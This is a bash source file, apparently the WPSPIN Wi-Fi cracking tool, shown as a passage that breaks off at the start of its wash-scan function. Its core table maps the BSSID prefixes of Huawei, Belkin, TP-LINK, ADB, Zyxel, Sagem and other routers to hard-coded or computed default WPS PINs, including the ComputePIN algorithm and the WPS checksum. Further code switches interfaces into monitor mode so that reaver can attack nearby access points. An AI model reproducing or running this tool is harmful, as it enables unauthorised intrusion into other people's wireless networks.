#!/bin/bash
# This script is released under the GNU General Public License as defined by the Free Software Foundation.
# This package is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY. It can be used, modified and shared provided the source is credited; it CANNOT be
# sold or used for a commercial purpose.
# See the details in the file LICENCE.txt that is situated in the folder of the script or visit http://gplv3.fsf.org/ )
# The discovery of one algorithm used in WPSPIN was made in parallel, and earlier, by zhaochunsheng in a C program named computepinC83A35. As I don't know C or
# programming and found this out after coding the first version of WPSPIN, this bash script does not use a single line of computepinC83A35.
# But it has to be said that zhaochunsheng found the main algorithm on Chinese access points months before I found it on a new Belkin N router, without knowing his work.
# The page of the author is sadly down and I cannot link you to a direct source.
# This code wouldn't have been possible with the help and advices of antares_145, r00tnuLL and 1camaron1, thanks to them billion a billion time :)
# It wouldn't have been possible neither without my beloved lampiweb.com work crew, maripuri, bentosouto, dirneet, betis-jesus, compota, errboricobueno, pinty_102 nad all users
# greetings to crack-wifi.com familly, yasmine, M1ck3y, spawn, goliate, fuji, antares has been already credited, koala, noireaude, vances1, konik etc... and all users
# greetings to auditoriaswireless.net and thanks to the big chief papones for the hosting and greetings to everybody
# This code uses wps reaver that has to be installed on it own, reaver is a free software (http://code.google.com/p/reaver-wps/) (GPL2) by Tactical Network Solutions. Thanks to
# them for this amazing work
# You also need aircrack-ng, thanks to Mister X and kevin devine for providing the best suite ever (http://www.aircrack-ng.org/)
# I would like also to thanks Stefan Viehbock for all is amazing work on wps (http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/)
# 1.1 (10-12-2012)
# - Support for PIN beginning with one or several 0 thanks to the data of atim and tresal.
# - New MAC supported : 6A:C0:6F (HG566 default ESSID vodafoneXXXX )
# 1.2 (12/12/2012)
# - Fixed output bugs in backtrack and other distributions
# - Added support to the generic default PIN known
# 1.3 (23/01/2013)
# - New supported devices:
# - 7 bSSID vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
# - 2 bSSID WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
# - 2 new models affected:
# 1) SWL (Samsung Wireless Link), default ESSID SEC_ LinkShare_XXXXXX. 2 known affected BSSID > 80:1F:02 / E4:7C:F9
# 2) Conceptronic c300brs4a (default ESSID C300BRS4A ) 1 BSSID known > 00:22:F7
# - Rules to check the validity of the mac address (thanks r00tnuLL and anteres_145 for your codes)
# - More filter for some case where several default ssid are possible,check the difference between ssid and bssid for FTE for possibles mismatch...
# - More information displayed when a target is selected
# - Display and colours problems are definitively solved for all distributions, one version
# - Rewriting of code (tanks to r00tnuLL, antares_145, goyfilms and 1camron1 for their advices and feed back)
# 1.4 ( 22/05/2013)
# - Complete Rewriting of code to provide new functions:
# - Multi language
# - A automated mode using wash and reaver
# - Interfaces management (automatic if only one interface is present, acting as filter if no mode monitor is possible to reduce options)
# - New supported bssid
# - 2 news bssid for FTE-XXXX (HG532c) 34:6B:D3 and F8:3D:FF
# - 16 new bssid for vodafone HG566a
# 62:23:3D 62:3C:E4 62:3D:FF 62:55:9C 62:7D:5E 62:B6:86 62:C7:14 6A:23:3D 6A:3D:FF 6A:7D:5E 6A:C6:1F 6A:D1:5E 72:53:D4 72:55:9C 72:6B:D3 72:A8:E4
# - New supported devices ( 9 models )
# - TP-LINK > TD-W8961ND v2.1 default SSID TP-LINK_XXXXXX 3 known bssids ; F8:D1:11 B0:48:7A 64:70:02
# - EDIMAX > 3G-6200n and EDIMAX > 3G-6210n bssid ; 00:1F:1F defaukt SSID : default
# - KOZUMI > K1500 and K1550 bssid : 00:26:CE
# - Zyxel > P-870HNU-51B bssid : FC:F5:28
# - TP-LINK TP-LINK_XXXXXX TL-WA7510N bssid : 90:F6:52:
# - SAGEM FAST 1704 > SAGEM_XXXX bssid : 7C:D3:4C:
##################################### COLORS
colorbase="\E[0m"          # reset attributes; kept in variables so every distribution prints the same sequences
# The values are stored as literal backslash sequences (double/single quotes do not expand them);
# whatever prints them must interpret the escapes (e.g. echo -e).
# bold (1;) colours
azulfluo="\033[1;36m"
amarillo="\033[1;33m"
rojo="\033[1;31m"
blanco="\033[1;37m"
magenta="\033[1;35m"
gris="\033[1;30m"
verdefluo="\033[1;32m"
# normal-weight (0;) colours
verde="\033[0;32m"
orange="\033[0;33m"
azul="\033[0;34m"
negro="\033[0;30m"
# blink attribute (written with \e rather than \033, as in the original)
clignote='\e[1;5m'
############################### FUNCTIONS ###########################################################################################
############################### FIRST THE ONE THAT ARE COMMON TO EVERY LANGUAGE (NO DISPLAY INVOLVED) ##################################################
############################## I > GENERATE - TO ATTRIBUTE PIN AND DATAS TO AP
############################### II > CHECKSUM (by antares_145 ) - CALCULATE THE WPS CHECKSUM
############################### III > ZAOMODE - APPLYING THE SAME ALGORITHM AS ZHAOCHUNSHENG IN COMPUTEPIN
############################### IV > IFACE - MANAGE INTERFACES FOR WIRELESS INTRUSION AND LIMIT THE USER TO THE SHORT MENU IF NO INTERFACE IS AVAILABLE
############################### V > IFACE_SELECTION - SELECT THE INTERFACE IF SEVERAL ARE AVAILABLE
############################### VI > WASH_SCAN - LAUNCH WPS SCANNING, REORGANIZING THE OUTPUT DISPLAY (uses wash from reaver)
############################### VII > REAVER_CHECK - CHECK THAT REAVER IS INSTALLED (ALSO CHECK WHETHER WASH OR WALSH IS USED)
############################### VIII > BIG_MENUE - WPSPIN WITH ALL FEATURES
############################### IX > CLEAN - REMOVE TMP FILES AND UNSET THE VARIABLES
################### GENERATE ######################################################################################################################################
################################################## the core of script, attribute a default PIN to the routers
###### VARIABLES CODIFIED ACTIVATED > 1 = YES 0 = NO SPECIAL > 1 = SEVERAL MODEL WITH THIS BSSID 2 = WPS AP RATE LIMIT ############################
############################### UNKNOWN > 0 = NO 1 = YES
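GENERATE(){ # Look up the target AP by BSSID (and, for a few vendors, ESSID) and set its default WPS PIN candidate(s).
# Inputs  (globals): BSSID - "XX:XX:XX:XX:XX:XX"; hex digits in either case, surrounding blanks are tolerated.
#                    ESSID - network name; only the FTE-XXXX, TELE2BOX_XXXX and DartyBox_XXX_X checks read it.
# Outputs (globals): PIN         - 8-digit candidate (zero padded); set by every arm.
#                    PIN2..PIN8  - further candidates, only for devices that ship several generic PINs.
#                    FABRICANTE, DEFAULTSSID, MODEL - vendor metadata for the display code.
#                    ACTIVATED   - 1 = WPS enabled by default, 0 = not.
#                    SPECIAL     - per the legend above: 1 = several models share this OUI, 2 = WPS AP rate limit.
#                                  NOTE(review): the Comtrend and TP-LINK arms set 2 while their original comments
#                                  described "several models with this OUI" - confirm which meaning the display uses.
#                    UNKNOWN     - 0 = OUI is in the table, 1 = not listed (PIN is then only the generic ZAO guess).
#                    CHECKBSSID, FINBSSID, MAC, CONVERTEDMAC (plus FINESSID/PAREMAC/CHECKMAC/MACESSID on the FTE path)
#                    stay global because the rest of the script displays them.
# Returns 1 when BSSID is not a well-formed MAC; UNKNOWN is then 1 and PIN is unset. Everything below assumes
# exactly twelve hex digits, so a malformed BSSID must not reach the base-16 arithmetic.
# Needs CHECKSUM and ZAOMODE, defined further down in this file.
  local bssid
  UNKNOWN=0
  SPECIAL=0
  # Drop the results of the previous lookup: a single-PIN device must not inherit PIN2..PIN8 or the vendor
  # strings of the device that was looked up before it (each arm below only sets what applies to it).
  unset PIN PIN2 PIN3 PIN4 PIN5 PIN6 PIN7 PIN8 FABRICANTE DEFAULTSSID MODEL ACTIVATED
  # Normalise: strip blanks and upper-case, so a lower-case OUI still matches the table.
  bssid=$(printf '%s' "$BSSID" | tr -d '[:blank:]' | tr 'a-f' 'A-F')
  if ! [[ $bssid =~ ^([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}$ ]]; then
    UNKNOWN=1
    return 1
  fi
  CHECKBSSID=${bssid:0:8}
  CHECKBSSID=${CHECKBSSID//:/}      # OUI (first three octets) identifies the device family
  FINBSSID=${bssid:9}               # last three octets feed the PIN algorithms
  MAC=${FINBSSID//:/}
  CONVERTEDMAC=$((16#$MAC))         # decimal value of the last three octets (what printf '%d' 0x$MAC gave)
  case "$CHECKBSSID" in
    04C06F | 202BC1 | 285FDB | 346BD3 | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0 | F83DFF) # FTE-XXXX (HUAWEI HG532c), algorithm by kcdtv
      PAREMAC=${MAC:0:2}            # MAC digits 7-8
      CHECKMAC=${MAC:2}             # MAC digits 9-12; the factory ESSID suffix sits at a fixed offset from them
      FINESSID=""
      if [[ $ESSID =~ ^FTE-([[:xdigit:]]{4})[[:blank:]]*$ ]]; then
        FINESSID=${BASH_REMATCH[1]} # the XXXX of FTE-XXXX, without trailing blanks
      fi
      # The single-PIN path is only valid when the ESSID is the factory one AND its suffix is at one of the
      # known offsets (+7, -1, -7) from the MAC tail. The previous `a && b || c || d` made the regex guard only
      # the first offset test, so a foreign ESSID could be accepted and non-hex text reached the conversions.
      if [[ -n $FINESSID ]] \
         && (( 16#$CHECKMAC == 16#$FINESSID + 7 || 16#$FINESSID == 16#$CHECKMAC + 1 || 16#$FINESSID == 16#$CHECKMAC + 7 )); then
        MACESSID=$PAREMAC$FINESSID  # MAC digits 7-8 followed by the ESSID suffix
        STRING=$((16#$MACESSID + 7))
        # NOTE(review): for PAREMAC >= 0x99 this exceeds seven digits and CHECKSUM then yields a 9-digit PIN,
        # exactly as the original did - confirm against kcdtv's algorithm before changing.
        CHECKSUM
      else                          # ESSID changed: offer the three candidates derived from the MAC alone
        STRING=$((CONVERTEDMAC % 10000000 + 8))
        CHECKSUM
        PIN2=$PIN
        STRING=$((CONVERTEDMAC % 10000000 + 14))
        CHECKSUM
        PIN3=$PIN
        ZAOMODE                     # first candidate: plain ComputePIN over the MAC tail
        CHECKSUM
      fi
      FABRICANTE="HUAWEI"
      DEFAULTSSID="FTE-XXXX"
      MODEL="HG532c Echo Life"
      ACTIVATED=1
      ;;
    001915) # WLAN_XXXX, OBSERVA TELECOM AW4062: generic 12345670, WPS off by default
      PIN=12345670
      FABRICANTE="OBSERVA TELECOM"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="AW4062"
      ACTIVATED=0
      ;;
    F43E61 | 001FA4) # WLAN_XXXX, OEM Shenzhen Gongjin Electronics / Encore ENDSL-4R5G: generic 12345670
      PIN=12345670
      FABRICANTE="OEM Shenzhen Gongjin Electronics"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="Encore ENDSL-4R5G"
      ACTIVATED=1
      ;;
    404A03) # WLAN_XXXX, ZyXEL P-870HW-51A V2: generic 11866428
      PIN=11866428
      FABRICANTE="ZYXELL"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="P-870HW-51A V2"
      ACTIVATED=1
      ;;
    001A2B) # WLAN_XXXX, Comtrend Gigabit 802.11n: generic 88478760
      # Comtrend has other models in this OUI; the same PIN is offered for all of them and the user is warned (SPECIAL).
      PIN=88478760
      FABRICANTE="Comtrend"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="Gigabit 802.11n"
      ACTIVATED=1
      SPECIAL=2
      ;;
    3872C0) # JAZZTEL_XXXX, Comtrend AR-5387un: generic 18836486 / 20172527
      # Part of this OUI is also used by Telefonica (WLAN_XXXX) without WPS at all, hence ACTIVATED=0 and SPECIAL.
      PIN=18836486
      PIN2=20172527
      FABRICANTE="Comtrend"
      DEFAULTSSID="JAZZTEL_XXXX"
      MODEL="AR-5387un"
      ACTIVATED=0
      SPECIAL=2
      ;;
    FCF528) # WLAN_XXXX, ZyXEL P-870HNU-51B: generic 20329761
      PIN=20329761
      FABRICANTE="ZYXELL"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="P-870HNU-51B"
      ACTIVATED=1
      SPECIAL=1
      ;;
    3039F2 | DC0B1A) # WLAN_XXXX, ADB-Broadband PDG-A4001N: several generic PINs (these two OUIs shared the same order)
      PIN=16538061
      PIN2=16702738
      PIN3=18355604
      PIN4=88202907
      PIN5=73767053
      PIN6=43297917
      PIN7=19756967
      PIN8=13409708
      FABRICANTE="ADB-Broadband"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="PDG-A4001N"
      ACTIVATED=1
      ;;
    74888B) # WLAN_XXXX, ADB-Broadband PDG-A4001N: same PIN set, different preferred order
      PIN=43297917
      PIN2=73767053
      PIN3=88202907
      PIN4=16538061
      PIN5=16702738
      PIN6=18355604
      PIN7=19756967
      PIN8=13409708
      FABRICANTE="ADB-Broadband"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="PDG-A4001N"
      ACTIVATED=1
      ;;
    A4526F) # WLAN_XXXX, ADB-Broadband PDG-A4001N: same PIN set, different preferred order
      PIN=16538061
      PIN2=88202907
      PIN3=73767053
      PIN4=16702738
      PIN5=43297917
      PIN6=18355604
      PIN7=19756967
      PIN8=13409708
      FABRICANTE="ADB-Broadband"
      DEFAULTSSID="WLAN_XXXX"
      MODEL="PDG-A4001N"
      ACTIVATED=1
      ;;
    5C4CA9 | 62233D | 623CE4 | 623DFF | 62559C | 627D5E | 62A8E4 | 62B686 | 62C06F | 62C61F | 62C714 | 62E87B | 6A233D | 6A3DFF | 6A53D4 | 6A559C | 6A6BD3 | 6A7D5E | 6AA8E4 | 6AC06F | 6AC61F | 6AC714 | 6AD15E | 6AD167 | 723DFF | 7253D4 | 72559C | 726BD3 | 727D5E | 72A8E4 | 72C06F | 72C714 | 72D15E | 72E87B )
      ZAO_DEVICE "HUAWEI" "vodafoneXXXX" "HG 566a"
      ;;
    002275)
      ZAO_DEVICE "Belkin" "Belkin_N+_XXXXXX" "F5D8235-4 v 1000"
      ;;
    08863B)
      ZAO_DEVICE "Belkin" "belkin.XXX" "F9K1104(N900 DB Wireless N+ Router)"
      ;;
    001CDF)
      ZAO_DEVICE "Belkin" "belkin.XXX" "F5D8235-4 v 1000"
      ;;
    00A026)
      ZAO_DEVICE "Teldat" "WLAN_XXXX" "iRouter1104-W"
      ;;
    5057F0)
      ZAO_DEVICE "Zyxel" "ZyXEL" "zyxel NBG-419n"
      ;;
    C83A35 | 00B00C | 081075) # the Tenda range zhaochunsheng originally published ComputePIN for
      ZAO_DEVICE "Tenda" "cf. computepinC83A35" "W309R"
      ;;
    E47CF9 | 801F02)
      ZAO_DEVICE "SAMSUNG" "SEC_ LinkShare_XXXXXX" "SWL (Samsung Wireless Link)"
      ;;
    0022F7)
      ZAO_DEVICE "Conceptronic" "C300BRS4A" "c300brs4a"
      ;;
    F8D111 | B0487A | 647002)
      ZAO_DEVICE "TP-LINK" "TP-LINK_XXXXXX" "TD-W8961ND v2.1"
      SPECIAL=2
      ;;
    001F1F) # EDIMAX 3G-6200n / 3G-6210n; the original had this OUI twice and the second (fuller) arm was unreachable
      ZAO_DEVICE "EDIMAX" "Default" "3G-6200n & 3G-6210n"
      ;;
    0026CE)
      ZAO_DEVICE "KUZOMI" "Default" "K1500 & K1550"
      ;;
    90F652) # TP-LINK_XXXXXX, TP-LINK TL-WA7510N: generic 12345670
      PIN=12345670
      FABRICANTE="TP-LINK"
      DEFAULTSSID="TP-LINK_XXXXXX"
      MODEL="TL-WA7510N"
      ACTIVATED=1
      ;;
    7CD34C) # SAGEM_XXXX, SAGEM FAST 1704: generic 43944552
      PIN=43944552
      FABRICANTE="SAGEM"
      DEFAULTSSID="SAGEM_XXXX"
      MODEL="fast 1704"
      ACTIVATED=1
      ;;
    000CC3) # BEWAN iBox: two factory SSIDs with two different generic PINs (TELE2BOX_XXXX > 47392717, DartyBox > 12345670)
      FABRICANTE="BEWAN"
      MODEL="Bewan iBox V1.0"
      ACTIVATED=1
      # NOTE(review): the DartyBox pattern ends in `{1}*`, which reads like a typo for `{1}`; kept unchanged to preserve matching.
      if [[ $ESSID =~ ^TELE2BOX_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then
        DEFAULTSSID="TELE2BOX_XXXX"
        SPECIAL=2
        PIN=47392717
      elif [[ $ESSID =~ ^DartyBox_[[:xdigit:]]{3}_[[:xdigit:]]{1}*$ ]]; then
        DEFAULTSSID="DartyBox_XXX_X"
        PIN=12345670
      else                          # ESSID changed: offer both
        DEFAULTSSID="TELE2BOX_XXXX / DartyBox_XXX_X"
        SPECIAL=2
        PIN=47392717
        PIN2=12345670
      fi
      ;;
    *) # OUI not in the table
      # A DartyBox can broadcast a BSSID unrelated to its real MAC, so it is recognised by ESSID alone.
      if [[ $ESSID =~ ^DartyBox_[[:xdigit:]]{3}_[[:xdigit:]]{1}*$ ]]; then
        FABRICANTE="BEWAN"
        DEFAULTSSID="DartyBox_XXX_X"
        MODEL="Bewan iBox V1.0"
        ACTIVATED=1
        PIN=12345670
      else                          # best effort: ComputePIN over the MAC tail, flagged as unsupported
        ZAOMODE
        CHECKSUM
        UNKNOWN=1
      fi
      ;;
  esac
}
ZAO_DEVICE(){ # Helper for GENERATE: PIN by the zhaochunsheng ComputePIN algorithm plus vendor metadata.
# $1 vendor (FABRICANTE), $2 factory SSID pattern (DEFAULTSSID), $3 model (MODEL). Sets PIN and ACTIVATED=1.
  ZAOMODE
  CHECKSUM
  FABRICANTE=$1
  DEFAULTSSID=$2
  MODEL=$3
  ACTIVATED=1
}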
################################################################################################ END GENERATE ################ FOR attributing the default PIN #################
#####################################################################################################
CHECKSUM(){ # Append the WPS check digit to the 7-digit prefix in STRING (bash version by antares_145, crack-wifi.com).
# Reads STRING (the first seven digits of the PIN as a decimal number). Writes PIN as an 8-digit, zero-padded
# string, and leaves ACCUM, DIGIT and CHECKSUM set like the original implementation did.
# Digits 1..7 (from the left of the 8-digit PIN) are weighted 3,1,3,1,3,1,3 and summed; the check digit is the
# one that brings the sum to a multiple of 10. A STRING longer than seven digits is processed the same way as
# before (only the lowest eight positions are weighted).
  local weights=(3 1 3 1 3 1 3) divisor=10000000 i
  PIN=$((10#$STRING * 10))          # shift left: position 8 is reserved for the check digit
  ACCUM=0
  for (( i = 0; i < 7; i++ )); do
    ACCUM=$(( ACCUM + weights[i] * ( (PIN / divisor) % 10 ) ))
    divisor=$(( divisor / 10 ))
  done
  DIGIT=$(( ACCUM % 10 ))
  CHECKSUM=$(( (10 - DIGIT) % 10 ))
  PIN=$(printf '%08d' $(( PIN + CHECKSUM )))   # zero-pad when the prefix started with zeros
}
ZAOMODE(){ # Seed STRING with the ComputePIN input: the last three MAC octets as a decimal number, reduced to seven digits.
# Reads CONVERTEDMAC (set by GENERATE); CHECKSUM is then called to append the check digit.
# This is the algorithm zhaochunsheng published as ComputePIN.
  STRING=$(( CONVERTEDMAC % 10000000 ))
}
IFACE(){ # Choose the interface (MON_ATTACK) that reaver and wash/walsh will use, enabling monitor mode on it when needed
# Globals read:    NO_MONITOR_MODE, MON_ADVERTENCIA, INTERFACEDESIGN, AIRMON_WARNING (language strings),
#                  the colour variables ($rojo, $amarillo, $blanco, $colorbase)
# Globals written: MON_ATTACK, IW_INTERFACE, IW_WLANX, IW_MONX, AIRMON_INTERFACE, AIRMON_CHIPSET,
#                  BAD_CHIPSET, RT_CHECK, CHIPSET_CHECK, SORTMENUE_WARNING, CHOIX, MONITORIZED, count, i
# The arrays created with "declare -a" below are LOCAL to IFACE (declare inside a function makes a
# local); IFACE_SELECTION and anything called from here see them only through bash dynamic scoping,
# and they disappear once IFACE returns.
# NOTE(review): /tmp/Interface.txt and /tmp/airmon.txt are fixed, predictable paths on a shared
# directory, written and then read back; a mktemp-created file would avoid clobbering and
# symlink issues there.
# Step 1: inventory the wireless devices the kernel reports. With none at all the script is
# sent to SHORTMENUE, where no scan or wireless attack is offered.
iw dev | grep Interface > /tmp/Interface.txt # one "Interface <name>" line per device
declare -a INTERFACE # all interface names
declare -a WLANX # names containing "wlan"
declare -a MONX # names containing "mon"
for i in 'INTERFACE' 'WLANX' 'MONX' ;
do
count=1 # arrays are filled from index 1, not 0
if [ "$i" == "INTERFACE" ]; then
while read -r line; do # one element per line of the filtered `iw dev` output
INTERFACE[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }') # second field is the interface name
elif [ "$i" == "WLANX" ]; then # same, keeping only names that match "wlan"
while read -r line; do
WLANX[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }' | grep wlan )
elif [ "$i" == "MONX" ]; then # same, keeping only names that match "mon"
while read -r line; do
MONX[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }' | grep mon )
fi
done
rm /tmp/Interface.txt &> /dev/null # temporary file no longer needed
IW_INTERFACE=$(echo ${#INTERFACE[@]}) # element counts; the echo wrapper is a no-op, ${#INTERFACE[@]} alone would do
IW_WLANX=$(echo ${#WLANX[@]})
IW_MONX=$(echo ${#MONX[@]})
if [ "$IW_INTERFACE" == 0 ]; then # no wireless device at all: restrict the script to the short menu
SORTMENUE_WARNING="$NO_MONITOR_MODE" # warning text defined by the selected language
SHORTMENUE # whether SHORTMENUE returns here or exits is not visible in this function
fi
# Step 2: ask airmon-ng which interfaces can do monitor mode and which chipset they use.
sudo airmon-ng | sed '1,4d' | sed '$d' > /tmp/airmon.txt # drop the four header lines and the last line of the airmon-ng table
declare -a MON_INTERFACE # interface name (first column)
declare -a MON_CHIPSET # chipset (second and third column joined)
for i in 'MON_INTERFACE' 'MON_CHIPSET'; # same fill pattern as in step 1
do
count=1
if [ "$i" == "MON_INTERFACE" ]; then
while read -r line; do
MON_INTERFACE[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/airmon.txt | awk -F' ' '{ print $1 }') # first field: wlanX or monX
elif [ "$i" == "MON_CHIPSET" ]; then
while read -r line; do
MON_CHIPSET[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/airmon.txt | awk -F' ' '{ print $2 $3 }' ) # fields 2 and 3 without a separator, which is why "RalinkRT2870" is matched below
fi
done
rm /tmp/airmon.txt &> /dev/null
AIRMON_INTERFACE=$(echo ${#MON_INTERFACE[@]})
AIRMON_CHIPSET=$(echo ${#MON_CHIPSET[@]})
BAD_CHIPSET=$( echo "${MON_CHIPSET[1]}" | grep Unknown) # only the FIRST chipset is tested here
if [ "$AIRMON_INTERFACE" == 0 ]; then # nothing monitor-capable: stay in the short menu (no wash, no reaver)
SORTMENUE_WARNING="$NO_MONITOR_MODE"
SHORTMENUE # language-dependent menu
elif [ "$IW_WLANX" == 1 ] && [ -n "${BAD_CHIPSET}" ] ; then # a single wlan whose chipset airmon-ng reports as Unknown
echo "$MON_ADVERTENCIA" # warning text defined by the selected language
sleep 8
sudo ifconfig $(echo "${MON_INTERFACE[1]}") down
MON_ATTACK=$( sudo airmon-ng start $(echo "${MON_INTERFACE[1]}") | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # new interface name parsed from airmon-ng's "enabled" line; depends on its output format
sudo ifconfig $(echo "${MON_INTERFACE[1]}") down # NOTE(review): identical to the "down" two lines above; presumably one of them was meant differently — verify
fi
# NOTE: the block above and the one below are independent ifs, so when both conditions hold
# airmon-ng start runs a second time on the same interface.
if [ "$AIRMON_INTERFACE" == 1 ] && [ "$IW_INTERFACE" == 1 ] ; then # exactly one device and it is monitor-capable: use it without asking
sudo ifconfig $(echo "${MON_INTERFACE[1]}") down
MON_ATTACK=$( sudo airmon-ng start $(echo "${MON_INTERFACE[1]}") | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # enable monitor mode and keep the new interface name
RT_CHECK=$( echo "${MON_CHIPSET[1]}" | grep RalinkRT2870) # Ralink RT2870/rt3070: the author keeps the managed interface up for this chipset
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo "${WLANX[1]}") up
else
sudo ifconfig $(echo "${WLANX[1]}") down
fi
elif [ "$AIRMON_INTERFACE" == 2 ] && [ "$IW_INTERFACE" == 2 ] && [ "$IW_MONX" == 1 ] ; then # one wlan plus one mon interface: the mon one is picked automatically
MON_ATTACK=$(echo "${MONX[1]}")
RT_CHECK=$( echo "${MON_CHIPSET[1]}" | grep RalinkRT2870) # same Ralink handling as above
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo "${WLANX[1]}") up
else
sudo ifconfig $(echo "${WLANX[1]}") down
fi
fi
if [ "$MON_ATTACK" == "" ] && [ "$IW_MONX" == 0 ]; then # still nothing chosen and no mon interface exists: let the user pick one
while [ "$MON_ATTACK" == "" ]; do # loop until an interface has been selected
echo "$INTERFACEDESIGN" # prompt text defined by the selected language
for i in ${!MON_INTERFACE[*]}; do # list every monitor-capable interface with its index
CHIPSET_REDLIST=$(echo ${MON_CHIPSET[${i}]} | grep Unknown )
if [ -n "${CHIPSET_REDLIST}" ]; then
CHIPSET_DISPLAY=$( echo -e "$rojo${MON_CHIPSET[${i}]})$colorbase") # unknown chipsets are shown in red
else
CHIPSET_DISPLAY=$( echo "${MON_CHIPSET[${i}]}" )
fi
CHECK_MON_INTERFACE=$(echo ${MON_INTERFACE[${i}]})
if [ "$CHECK_MON_INTERFACE" = "wlan0" ] || [ "$CHECK_MON_INTERFACE" = "wlan1" ] || [ "$CHECK_MON_INTERFACE" = "wlan2" ] || [ "$CHECK_MON_INTERFACE" = "wlan3" ]|| [ "$CHECK_MON_INTERFACE" = "wlan4" ]|| [ "$CHECK_MON_INTERFACE" = "wlan5" ]|| [ "$CHECK_MON_INTERFACE" = "wlan6" ]|| [ "$CHECK_MON_INTERFACE" = "wlan7" ]|| [ "$CHECK_MON_INTERFACE" = "wlan8" ]|| [ "$CHECK_MON_INTERFACE" = "wlan9" ]; then
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} $CHIPSET_DISPLAY $colorbase" # NOTE: both branches print the same line, so the wlan0..wlan9 test has no effect
else
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} $CHIPSET_DISPLAY $colorbase"
fi
done
echo ""
echo -e " $colorbase ---------------------------------------------------"
echo ""
SELECT_THEIFACE # language-dependent prompt; presumably sets i to the chosen index, since the lines below reuse i — verify
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) down # bring the chosen interface down
MON_ATTACK=$( sudo airmon-ng start $(echo ${MON_INTERFACE[${i}]}) | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # enable monitor mode on it
RT_CHECK=$(echo ${MON_CHIPSET[${i}]} | grep RalinkRT2870 ) # same Ralink handling as above
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) up
else
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) down
fi
done
fi
IFACE_SELECTION(){ # Interactive fallback, (re)defined every time IFACE runs and called right below when MON_ATTACK is still empty
# Reads the IFACE-local arrays MON_INTERFACE / MON_CHIPSET through dynamic scoping, plus the loop index i.
while [ "$MON_ATTACK" == "" ]; do # loop until an interface has been selected
echo "$INTERFACEDESIGN" # prompt text defined by the selected language
for i in ${!MON_INTERFACE[*]}; do # list the available interfaces with their index
CHECK_MON_INTERFACE=$(echo ${MON_INTERFACE[${i}]})
if [ "$CHECK_MON_INTERFACE" = "wlan0" ] || [ "$CHECK_MON_INTERFACE" = "wlan1" ] || [ "$CHECK_MON_INTERFACE" = "wlan2" ] || [ "$CHECK_MON_INTERFACE" = "wlan3" ]|| [ "$CHECK_MON_INTERFACE" = "wlan4" ]|| [ "$CHECK_MON_INTERFACE" = "wlan5" ]|| [ "$CHECK_MON_INTERFACE" = "wlan6" ]|| [ "$CHECK_MON_INTERFACE" = "wlan7" ]|| [ "$CHECK_MON_INTERFACE" = "wlan8" ]|| [ "$CHECK_MON_INTERFACE" = "wlan9" ]; then
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} ${MON_CHIPSET[${i}]} $colorbase" # NOTE: both branches print the same line, so the wlan0..wlan9 test has no effect
else
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} ${MON_CHIPSET[${i}]} $colorbase"
fi
done
echo ""
echo -e " $colorbase ---------------------------------------------------"
echo ""
SELECT_THEIFACE # language-dependent prompt; presumably sets i to the chosen index — verify
CHOIX=$( echo " ${MON_INTERFACE[${i}]} ") # chosen interface, padded with one space on each side
if [ "$CHOIX" == "" ]; then # NOTE(review): because of the padding CHOIX is never "", so this retry cannot trigger
IFACE_SELECTION # recursive retry meant for a wrong entry
fi
MONITORIZED=$( echo "$CHOIX" | grep mon ) # non-empty when the choice is already a mon interface
if [ "$MONITORIZED" == "" ]; then # otherwise the wlanX/ethX has to be switched to monitor mode
sudo ifconfig $CHOIX down # unquoted, so word splitting drops the padding spaces
MON_ATTACK=$( sudo airmon-ng start $CHOIX | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # new interface name parsed from airmon-ng's "enabled" line
RT_CHECK=$( echo ${MON_CHIPSET[${i}]} | grep RalinkRT2870 ) # same Ralink handling as in IFACE
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) up
else
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) down
fi
# end of the monitor-mode branch
else
MON_ATTACK="$CHOIX" # NOTE: keeps the padding spaces; later unquoted uses of $MON_ATTACK strip them, quoted ones will not
fi
done
}
IFACE_SELECTION
CHIPSET_CHECK=$( (echo ${MON_CHIPSET[${i}]}) | grep Unknown ) # i is whatever the last loop or prompt left it at — presumably the chosen index
if [ -n "${CHIPSET_CHECK}" ]; then # warn when the chosen chipset is reported as Unknown
echo "$AIRMON_WARNING"
sleep 8
fi
}
WASH_SCAN(){ # Parse wash_scan.txt into one array per column, then hand over to WASH_DISPLAY, OUTPUT and ATTACK
# Globals read:    WALSH_O_WASH ("wash" or "walsh", set by REAVER_CHECK) selects the column layout
# Globals written: count, i. The arrays below are created with "declare -a" inside the function and
